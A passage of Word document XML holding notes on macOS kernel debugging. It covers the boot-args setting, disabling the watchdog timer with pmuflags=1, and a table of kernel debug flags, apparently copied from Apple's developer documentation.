          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nvram bootargs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6762B" w:rsidRDefault="00A6762B" w:rsidP="00892A93">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005D29AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/Library/Preferences/SystemConfiguaration/com.apple.Boot.plist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6762B" w:rsidRDefault="004106D2" w:rsidP="00A6762B">
      <w:hyperlink r:id="rId47" w:anchor="//apple_ref/doc/uid/TP30000905-CH221-CIHIAFFJ" w:history="1">
        <w:r w:rsidR="00A6762B" w:rsidRPr="001D68D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/build/build.html#//apple_ref/doc/uid/TP30000905-CH221-CIHIAFFJ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A6762B" w:rsidRDefault="004106D2" w:rsidP="00892A93">
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="00B72483" w:rsidRPr="00945BD0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/mac/technotes/tn2004/tn2118.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B72483" w:rsidRPr="00A6762B" w:rsidRDefault="00B72483" w:rsidP="00892A93"/>
    <w:p w:rsidR="00A6762B" w:rsidRDefault="00A6762B" w:rsidP="00892A93">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6762B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>To disable this watchdog timer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, add the argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pmuflags=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>to the kernel's boot arguments.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7478" w:type="dxa"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:top w:w="50" w:type="dxa"/>
          <w:left w:w="50" w:type="dxa"/>
          <w:bottom w:w="50" w:type="dxa"/>
          <w:right w:w="50" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1863"/>
        <w:gridCol w:w="901"/>
        <w:gridCol w:w="4714"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF3A32" w:rsidTr="00BF3A32">
        <w:trPr>
          <w:trHeight w:val="654"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="93A5BB"/>
            <w:tcMar>
              <w:top w:w="72" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="72" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00BF3A32" w:rsidRDefault="00BF3A32">
            <w:pPr>
              <w:spacing w:after="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Table 20-1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> Debugging flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF3A32" w:rsidRPr="00BF3A32" w:rsidTr="00BF3A32">
        <w:trPr>
          <w:trHeight w:val="352"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>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rsidR="00BF3A32" w:rsidRPr="00BF3A32" w:rsidRDefault="00BF3A32">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="79" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Symbolic name</w:t>
            </w:r>
          </w:p>
        </w:tc>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rsidR="00BF3A32" w:rsidRPr="00BF3A32" w:rsidRDefault="00BF3A32">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="79" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>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rsidR="00BF3A32" w:rsidRPr="00BF3A32" w:rsidRDefault="00BF3A32">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="79" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meaning</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HALT</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01</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Halt at boot-time and wait for debugger attach (</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gdb</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>).</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PRT</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02</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Send kernel debugging</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId49" w:anchor="//apple_ref/doc/man/3/printf" w:tgtFrame="_self" w:history="1">
              <w:r w:rsidRPr="00BF3A32">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                  <w:color w:val="3366CC"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>printf</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>output to console.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF3A32" w:rsidRPr="00BF3A32" w:rsidTr="00BF3A32">
        <w:trPr>
          <w:trHeight w:val="834"/>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NMI</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0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Drop into debugger on NMI (Command–Power, Command-Option-Control-Shift-Escape, or interrupt switch).</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KPRT</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08</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Send kernel debugging</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>kprintf</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>output to serial port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF3A32" w:rsidRPr="00BF3A32" w:rsidTr="00BF3A32">
        <w:trPr>
          <w:trHeight w:val="564"/>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KDB</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1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Make</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ddb</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>kdb</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>) the default debugger (requires a custom kernel).</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SLOG</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2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Output certain diagnostic info to the system log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF3A32" w:rsidRPr="00BF3A32" w:rsidTr="00BF3A32">
        <w:trPr>
          <w:trHeight w:val="1111"/>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ARP</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4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Allow debugger to ARP and route (allows debugging across routers and removes the need for a permanent ARP entry, but is a potential security</w:t>
            </w:r>
            <w:bookmarkStart w:id="107" w:name="//apple_ref/doc/uid/TP30000905-CH221-Don"/>
            <w:bookmarkEnd w:id="107"/>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>hole)—not available in all kernels.</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KDP_BP_DIS</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8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Support old versions of</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gdb</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>on newer systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF3A32" w:rsidRPr="00BF3A32" w:rsidTr="00BF3A32">
        <w:trPr>
          <w:trHeight w:val="278"/>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Style w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="666666"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DB_LOG_PI_SCRN</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0x1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F3A32" w:rsidRPr="00BF3A32" w:rsidRDefault="00BF3A32">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF3A32">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Disable graphical panic dialog.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BF3A32" w:rsidRDefault="00BF3A32" w:rsidP="00892A93"/>
    <w:p w:rsidR="00B72483" w:rsidRDefault="00B72483" w:rsidP="00B72483">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="84"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc445313311"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>Debug Flags in Depth</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w:rsidR="00B72483" w:rsidRDefault="00B72483" w:rsidP="00B72483">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0" w:line="324"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You can use the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>boot-args</w:t>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debug flags to control various aspects of kernel debugging. Many of these flags are documented in</w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
            <w:color w:val="3366CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>existing documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:anchor="LISTDEBUGFLAGS" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
            <w:color w:val="3366CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Table 1</w:t>
        </w:r>
      </w:hyperlink>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describes the flags most relevant to kernel core dumps.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:anchor="LISTDEBUGFLAGSCOMB" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
            <w:color w:val="3366CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Table 2</w:t>
        </w:r>
      </w:hyperlink>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shows how to combine these flags to effect various useful behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72483" w:rsidRDefault="00B72483" w:rsidP="00B72483">
      <w:pPr>
        <w:pStyle w:val="smalltext"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0" w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="LISTDEBUGFLAGS"/>
      <w:bookmarkEnd w:id="109"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table 1 :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Debug flags</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3375"/>
        <w:gridCol w:w="1090"/>
        <w:gridCol w:w="4191"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B72483" w:rsidTr="00B72483">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
